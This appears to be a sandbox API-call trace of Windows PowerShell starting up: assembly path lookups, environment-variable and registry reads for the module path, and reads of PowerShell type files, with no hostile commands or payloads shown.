	[0268.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.365] SetConsoleCtrlHandler (HandlerRoutine=0x27968dc, Add=1) returned 1
	[0269.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0269.369] CoCreateGuid (in: pguid=0xcdeb0 | out: pguid=0xcdeb0*(Data1=0xaa9f3de, Data2=0x5061, Data3=0x474a, Data4=([0]=0x9d, [1]=0xb0, [2]=0x67, [3]=0x7f, [4]=0xc7, [5]=0xc, [6]=0x9, [7]=0x44))) returned 0x0
	[0269.371] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.371] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.377] WinSqmIsOptedIn () returned 0x0
	[0269.378] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.378] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.381] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.381] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.382] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.382] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.915] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.916] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.917] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.917] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.922] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.922] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.923] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.923] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.923] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.923] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.925] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.925] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.929] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.929] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.930] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.930] CoTaskMemFree (pv=0x1b8428b0) 
	[0269.930] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0269.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.930] CoTaskMemFree (pv=0x1b8428b0) 
	[0271.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.938] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0271.938] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0271.939] CoTaskMemFree (pv=0x1b8428b0) 
	[0271.940] CoTaskMemAlloc (cb=0xcc) returned 0x188ff0
	[0271.940] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x188ff0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0271.940] CoTaskMemFree (pv=0x188ff0) 
	[0271.940] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda28 | out: phkResult=0xcda28*=0x1c8) returned 0x0
	[0271.941] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd9ac, lpData=0x0, lpcbData=0xcd9a8*=0x0 | out: lpType=0xcd9ac*=0x2, lpData=0x0, lpcbData=0xcd9a8*=0x6c) returned 0x0
	[0271.941] CoTaskMemAlloc (cb=0x70) returned 0x175190
	[0271.941] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd97c, lpData=0x175190, lpcbData=0xcd978*=0x6c | out: lpType=0xcd97c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd978*=0x6c) returned 0x0
	[0271.941] CoTaskMemFree (pv=0x175190) 
	[0271.941] CoTaskMemAlloc (cb=0xcc) returned 0x188ff0
	[0271.941] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x188ff0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0271.941] CoTaskMemFree (pv=0x188ff0) 
	[0271.941] CoTaskMemAlloc (cb=0xcc) returned 0x188ff0
	[0271.941] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x188ff0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0271.941] CoTaskMemFree (pv=0x188ff0) 
	[0272.413] RegCloseKey (hKey=0x1c8) returned 0x0
	[0272.413] CoTaskMemAlloc (cb=0xcc) returned 0x188ff0
	[0272.413] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x188ff0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0272.413] CoTaskMemFree (pv=0x188ff0) 
	[0272.414] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda28 | out: phkResult=0xcda28*=0x1c8) returned 0x0
	[0272.414] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd9ac, lpData=0x0, lpcbData=0xcd9a8*=0x0 | out: lpType=0xcd9ac*=0x0, lpData=0x0, lpcbData=0xcd9a8*=0x0) returned 0x2
	[0272.414] RegCloseKey (hKey=0x1c8) returned 0x0
	[0272.418] CoTaskMemAlloc (cb=0x20c) returned 0x1c4b40
	[0272.418] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1c4b40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0272.419] CoTaskMemFree (pv=0x1c4b40) 
	[0272.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0272.421] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0272.425] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0272.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.426] CoTaskMemFree (pv=0x1b8428b0) 
	[0272.463] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0272.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.463] CoTaskMemFree (pv=0x1b8428b0) 
	[0272.469] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0272.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.469] CoTaskMemFree (pv=0x1b8428b0) 
	[0272.469] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0272.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.469] CoTaskMemFree (pv=0x1b8428b0) 
	[0272.470] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd818 | out: phkResult=0xcd818*=0x1cc) returned 0x0
	[0272.471] RegQueryValueExW (in: hKey=0x1cc, lpValueName="path", lpReserved=0x0, lpType=0xcd82c, lpData=0x0, lpcbData=0xcd828*=0x0 | out: lpType=0xcd82c*=0x1, lpData=0x0, lpcbData=0xcd828*=0x74) returned 0x0
	[0272.472] RegQueryValueExW (in: hKey=0x1cc, lpValueName="path", lpReserved=0x0, lpType=0xcd79c, lpData=0x0, lpcbData=0xcd798*=0x0 | out: lpType=0xcd79c*=0x1, lpData=0x0, lpcbData=0xcd798*=0x74) returned 0x0
	[0272.472] CoTaskMemAlloc (cb=0x78) returned 0x175190
	[0272.472] RegQueryValueExW (in: hKey=0x1cc, lpValueName="path", lpReserved=0x0, lpType=0xcd76c, lpData=0x175190, lpcbData=0xcd768*=0x74 | out: lpType=0xcd76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd768*=0x74) returned 0x0
	[0272.472] CoTaskMemFree (pv=0x175190) 
	[0272.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0272.472] SetErrorMode (uMode=0x1) returned 0x1
	[0272.472] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd6f0 | out: lpFileInformation=0xcd6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0272.472] SetErrorMode (uMode=0x1) returned 0x1
	[0272.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0272.473] SetErrorMode (uMode=0x1) returned 0x1
	[0272.473] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd6f0 | out: lpFileInformation=0xcd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0272.473] SetErrorMode (uMode=0x1) returned 0x1
	[0272.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0272.476] SetErrorMode (uMode=0x1) returned 0x1
	[0272.476] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd6f0 | out: lpFileInformation=0xcd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0272.476] SetErrorMode (uMode=0x1) returned 0x1
	[0272.477] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0272.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.477] CoTaskMemFree (pv=0x1b8428b0) 
	[0272.478] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0272.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.478] CoTaskMemFree (pv=0x1b8428b0) 
	[0272.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0272.484] SetErrorMode (uMode=0x1) returned 0x1
	[0272.484] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0272.485] GetFileType (hFile=0x330) returned 0x1
	[0272.485] SetErrorMode (uMode=0x1) returned 0x1
	[0272.485] GetFileType (hFile=0x330) returned 0x1
	[0272.486] ReadFile (in: hFile=0x330, lpBuffer=0x2d48858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2d48858*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0272.488] ReadFile (in: hFile=0x330, lpBuffer=0x2d48858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2d48858*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0272.488] ReadFile (in: hFile=0x330, lpBuffer=0x2d48858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2d48858*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.101] ReadFile (in: hFile=0x330, lpBuffer=0x2d48858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2d48858*, lpNumberOfBytesRead=0xcd628*=0xcf3, lpOverlapped=0x0) returned 1
	[0273.101] ReadFile (in: hFile=0x330, lpBuffer=0x2d47cb3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2d47cb3*, lpNumberOfBytesRead=0xcd628*=0x0, lpOverlapped=0x0) returned 1
	[0273.101] ReadFile (in: hFile=0x330, lpBuffer=0x2d48858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2d48858*, lpNumberOfBytesRead=0xcd628*=0x0, lpOverlapped=0x0) returned 1
	[0273.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0273.104] SetErrorMode (uMode=0x1) returned 0x1
	[0273.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd5a0 | out: lpFileInformation=0xcd5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0273.104] SetErrorMode (uMode=0x1) returned 0x1
	[0273.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0273.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd688 | out: phkResult=0xcd688*=0x330) returned 0x0
	[0273.105] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd60c, lpData=0x0, lpcbData=0xcd608*=0x0 | out: lpType=0xcd60c*=0x1, lpData=0x0, lpcbData=0xcd608*=0x56) returned 0x0
	[0273.106] CoTaskMemAlloc (cb=0x5a) returned 0x1b835890
	[0273.106] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5dc, lpData=0x1b835890, lpcbData=0xcd5d8*=0x56 | out: lpType=0xcd5dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd5d8*=0x56) returned 0x0
	[0273.106] CoTaskMemFree (pv=0x1b835890) 
	[0273.106] RegCloseKey (hKey=0x330) returned 0x0
	[0273.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0273.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
